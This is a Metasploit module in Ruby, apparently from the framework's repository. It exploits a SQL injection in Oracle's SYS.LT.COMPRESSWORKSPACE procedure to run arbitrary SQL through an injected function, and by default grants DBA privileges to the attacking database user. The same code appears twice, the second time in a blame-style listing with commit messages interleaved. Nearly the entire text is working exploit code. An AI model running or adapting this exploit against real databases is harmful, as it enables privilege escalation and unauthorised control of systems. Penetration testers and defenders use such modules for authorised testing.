metasploit-framework/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::ORACLE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection via SYS.LT.COMPRESSWORKSPACE.',
			'Description'    => %q{
				This module exploits an sql injection flaw in the COMPRESSWORKSPACE
				procedure of the PL/SQL package SYS.LT. Any user with execute
				privilege on the vulnerable package can exploit this vulnerability.
			},
			'Author'         => [ 'CG' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
				],
			'DisclosureDate' => 'Nov 11, 2008'))

			register_options( 
				[
					OptString.new('SQL', [ false, 'SQL to execte.',  "GRANT DBA to #{datastore['DBUSER']}"]),					
				], self.class)
	end

	def run
		name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
		cruft = Rex::Text.rand_text_alpha_upper(1)
		
		function = "
			CREATE OR REPLACE FUNCTION #{cruft} 
			RETURN VARCHAR2 AUTHID CURRENT_USER
			AS
			PRAGMA AUTONOMOUS_TRANSACTION;
			BEGIN
			EXECUTE IMMEDIATE '#{datastore['SQL']}';
			COMMIT;
			RETURN '#{cruft}';
			END;"

		package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"
		
		package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

		clean = "DROP FUNCTION #{cruft}"

		print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")

		print_status("Sending function...")
		prepare_exec(function)
		
		begin
			prepare_exec(package1)
			prepare_exec(package2)
		rescue  => e
			if ( e.to_s =~ /No Data/ )
				print_status("Removing function '#{cruft}'...")
				prepare_exec(clean)
			else
				return
			end
		end

	end

end
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::ORACLE`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'SQL Injection via SYS.LT.COMPRESSWORKSPACE.',`
			`'Description' => %q{`
			`This module exploits an sql injection flaw in the COMPRESSWORKSPACE`
			`procedure of the PL/SQL package SYS.LT. Any user with execute`
			`privilege on the vulnerable package can exploit this vulnerability.`
			`},`
			`'Author' => [ 'CG' ],`
			`'License' => MSF_LICENSE,`
svn:keywords run git-svn-id: file:///home/svn/framework3/trunk@7128 4d416f70-5f16-0410-b530-b9f4589650da 2009-10-04 23:38:06 +00:00			`'Version' => '$Revision$',`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`'References' =>`
			`[`
			`[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],`
			`[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],`
			`],`
			`'DisclosureDate' => 'Nov 11, 2008'))`

			`register_options(`
			`[`
			`OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),`
			`], self.class)`
			`end`

			`def run`
			`name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)`
			`cruft = Rex::Text.rand_text_alpha_upper(1)`

			`function = "`
			`CREATE OR REPLACE FUNCTION #{cruft}`
			`RETURN VARCHAR2 AUTHID CURRENT_USER`
			`AS`
			`PRAGMA AUTONOMOUS_TRANSACTION;`
			`BEGIN`
			`EXECUTE IMMEDIATE '#{datastore['SQL']}';`
			`COMMIT;`
			`RETURN '#{cruft}';`
			`END;"`

			`package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"`

			`package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"`

			`clean = "DROP FUNCTION #{cruft}"`

			`print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")`
updated oracle mixin and adjusted affected modules. now compatible with ruby 1.8 and 1.9 git-svn-id: file:///home/svn/framework3/trunk@7688 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-03 23:57:02 +00:00
			`print_status("Sending function...")`
			`prepare_exec(function)`

converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`begin`
updated oracle mixin and adjusted affected modules. now compatible with ruby 1.8 and 1.9 git-svn-id: file:///home/svn/framework3/trunk@7688 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-03 23:57:02 +00:00			`prepare_exec(package1)`
			`prepare_exec(package2)`
			`rescue => e`
			`if ( e.to_s =~ /No Data/ )`
			`print_status("Removing function '#{cruft}'...")`
			`prepare_exec(clean)`
			`else`
			`return`
			`end`
converted the current fileformat modules to use the new mixin. also added a few new ones. git-svn-id: file:///home/svn/framework3/trunk@6917 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 13:43:37 +00:00			`end`

			`end`

			`end`